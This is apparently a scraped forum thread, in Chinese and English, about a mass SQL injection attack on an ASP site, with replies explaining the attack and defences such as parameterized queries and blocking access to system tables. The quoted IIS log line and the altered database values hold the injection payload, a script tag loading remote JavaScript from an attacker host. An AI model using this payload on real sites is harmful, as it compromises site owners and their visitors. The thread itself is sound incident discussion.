SQL注入 [英] SQL Injection
问题描述
- - - - - - - - - IIS日志文件输入 - - - - - - - - - - - - - - - -
GET /sresult.asp
title =(你的%20Love%20Keeps%20Lifting%20Me)%20Highe r%20And%20Higher& artist = Michael%20McDonald& type =%2 5& category =%25& column = t_asc%3Cscript%20src =
http://www.advabnr.com /b.js%3E%3C/script%3E 80 - 76.16.112.66 HTTP / 1.1
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
我的表显然是用SQL注入命中的。我搜索了IIS日志,
发现了以下数百个实例。问题...
1)最终结果是我的图像列被更新以反映:
原始数据:files / icons / ps987_75.jpg
更新数据:files / icons / ps987_75.jpg< script
src = http://www.advabnr.com/b.js>< / script>
成千上万的记录如上所述更新。
我尝试下载 http://www.advabnr.com/b.js 看看里面有什么,但是它没有b $ b。
js文件中可能有什么原因导致这样的更新?
2)我不知道他们怎么知道表名或列名。
与#1相同的问题我想。
3)我当时正在使用该页面上的存储过程从
中选择
表。我如何阻止类似的恶意努力再次发生?
感谢
- - - - - - - - - IIS Log File Entry - - - - - - - - - - - - - - - -
GET /sresult.asp
title=(Your%20Love%20Keeps%20Lifting%20Me)%20Highe r%20And%20Higher&artist=Michael%20McDonald&type=%2 5&category=%25&column=t_asc%3Cscript%20src=
http://www.advabnr.com/b.js%3E%3C/script%3E 80 - 76.16.112.66 HTTP/1.1
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
My table was evidently hit with SQL Injection. I searched the IIS logs and
found hundreds of the below instances. Questions...
1) The end result was my image columns were updated to reflect:
Original data: files/icons/ps987_75.jpg
Updated data: files/icons/ps987_75.jpg<script
src=http://www.advabnr.com/b.js></script>
Thousands of records were updated like the above.
I tried downloading http://www.advabnr.com/b.js to see what''s inside, but it
wasn''t available.
What could have been in the js file to cause such an update?
2) I don''t see how they could have known the Table name or the column names.
Same question as #1 I guess.
3) I was and still am using a stored procedure on that page to SELECT from
the table. How do I stop similar malicious efforts from happening again?
thanks
推荐答案
shank写道:
shank wrote:
- - - - - - - - - IIS日志文件条目 - - - - - - - - - - - - - - - -
GET /sresult.asp
title =(你的%20Love%20Keeps%20Lifting%20Me)%20Highe r%20And%20Higher& artist = Michael%20McDonald& type =%2 5& category =% 25& column = t_asc%3Cscript%20src =
http://www.advabnr.com/b.js%3E%3C/script%3E 80 - 76.16.112.66 HTTP / 1.1
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
我的表显然是用SQL注入的。我搜索了IIS
日志,发现了以下数百个实例。问题...
1)最终结果是我的图像列被更新以反映:
原始数据:files / icons / ps987_75.jpg
更新数据:files / icons / ps987_75.jpg< script
src = http://www.advabnr.com/b.js>< / script>
成千上万的记录如上所述更新。
我尝试下载 http://www.advabnr.com/b.js 看看里面是什么,
但是它不可用。
js文件中可能出现这样的更新?
- - - - - - - - - IIS Log File Entry - - - - - - - - - - - - - - - -
GET /sresult.asp
title=(Your%20Love%20Keeps%20Lifting%20Me)%20Highe r%20And%20Higher&artist=Michael%20McDonald&type=%2 5&category=%25&column=t_asc%3Cscript%20src=
http://www.advabnr.com/b.js%3E%3C/script%3E 80 - 76.16.112.66 HTTP/1.1
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
My table was evidently hit with SQL Injection. I searched the IIS
logs and found hundreds of the below instances. Questions...
1) The end result was my image columns were updated to reflect:
Original data: files/icons/ps987_75.jpg
Updated data: files/icons/ps987_75.jpg<script
src=http://www.advabnr.com/b.js></script>
Thousands of records were updated like the above.
I tried downloading http://www.advabnr.com/b.js to see what''s inside,
but it wasn''t available.
What could have been in the js file to cause such an update?
http://mvp.unixwiz.net/techtips/sql-injection.html
http://www.sqlsecurity.com/DesktopDefault.aspx?tabid=23
http://www.nextgenss.com/papers/adva..._injection.pdf
http://www.nextgenss.com/papers/more..._injection.pdf
http://mvp.unixwiz.net/techtips/sql-injection.html
http://www.sqlsecurity.com/DesktopDefault.aspx?tabid=23
http://www.nextgenss.com/papers/adva..._injection.pdf
http://www.nextgenss.com/papers/more..._injection.pdf
2)我不知道他们怎么知道表名或列
名。与#1相同的问题我猜。
2) I don''t see how they could have known the Table name or the column
names. Same question as #1 I guess.
相同的答案 - 通过导致错误消息,编码实践允许将
返回给用户。
Same answer - by causing error messagess that poor coding practice allow to
be returned to the user.
>
3)我当时正在使用该页面上的存储过程来选择
从表中。如何阻止类似的恶意努力再次发生?b $ b?
>
3) I was and still am using a stored procedure on that page to SELECT
from the table. How do I stop similar malicious efforts from happening
again?
使用参数:
http://groups.google.com/group/micro...fedf4e1efd63a6
-
Microsoft MVP - ASP / ASP.NET
请回复新闻组。这个电子邮件帐户是我的垃圾邮件陷阱所以我
不经常检查它。如果您必须离线回复,请删除
无垃圾邮件
Use parameters:
http://groups.google.com/group/micro...fedf4e1efd63a6
--
Microsoft MVP - ASP/ASP.NET
Please reply to the newsgroup. This email account is my spam trap so I
don''t check it very often. If you must reply off-line, then remove the
"NO SPAM"
Bob Barrows [MVP]"写道:
"Bob Barrows [MVP]" wrote:
shank写道:
shank wrote:
2)我不知道他们怎么会知道表名或列
名称。与#1相同的问题我猜。
2) I don''t see how they could have known the Table name or the column
names. Same question as #1 I guess.
相同的答案 - 通过导致错误消息,可怜的编码练习允许将
返回给用户。
Same answer - by causing error messagess that poor coding practice allow to
be returned to the user.
不,不是真的。哦,这是糟糕的编码实践,但原始注入
(这里没有看到)代码去读取系统表并尝试
发现所有用户表名和所有用户VARCHAR,NVARCHAR,TEXT,NTEXT
字段名称和* THEN *将JavaScript注入所有这些字段。
它是'实际上是相当复杂的。但它很容易受到保护,只需禁止从IUSR_xxx和IWAM_xxx
帐户访问系统表。 (好吧,当然首先要练习ASP
页面的优秀编程。但即使你的ASP代码很差,如果你正确地设置了数据库
特别攻击失败了。)
如果你关心,我想我可以找到实际注入攻击代码的副本
仍在潜伏,显示它是如何循环的所有表格和字段。
No, not really. Oh, it''s poor coding practice, but the original injection
(not seen here) is code that goes and reads the system tables and tries to
discover all user table names and all user VARCHAR, NVARCHAR, TEXT, NTEXT
field names and *THEN* injects the JavaScript into all those fields.
It''s pretty sophisiticated, actually. But it''s easily protected against by
simply disallowing access to the sytem tables from the IUSR_xxx and IWAM_xxx
accounts. (Well, and of course by practicing good programming of the ASP
page in the first place. But even with poor ASP code, if you set up the DB
correctly the particular attack fails.)
If you care, I think I can find a copy of the actual injection attack code
still lurking, showing how it loops on all the tables and fields.
这是一个如何将它最初注入至少一个网站
网站的示例:
http://www.aspmessageboard.com/forum...997&P=1#894984
下一篇文章是我的解码然后Xander的帖子在这里有一个链接到
:
http://isc.sans.org/diary.html?n&storyid=4294
th at更全面地解释了整个过程。
Here''s an example of how it was originally injected into at least one web
site and thus database:
http://www.aspmessageboard.com/forum...997&P=1#894984
The next post is my decoding of that and then Xander''s post has a link to
here:
http://isc.sans.org/diary.html?n&storyid=4294
that explains the whole process even more.
这篇关于SQL注入的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!
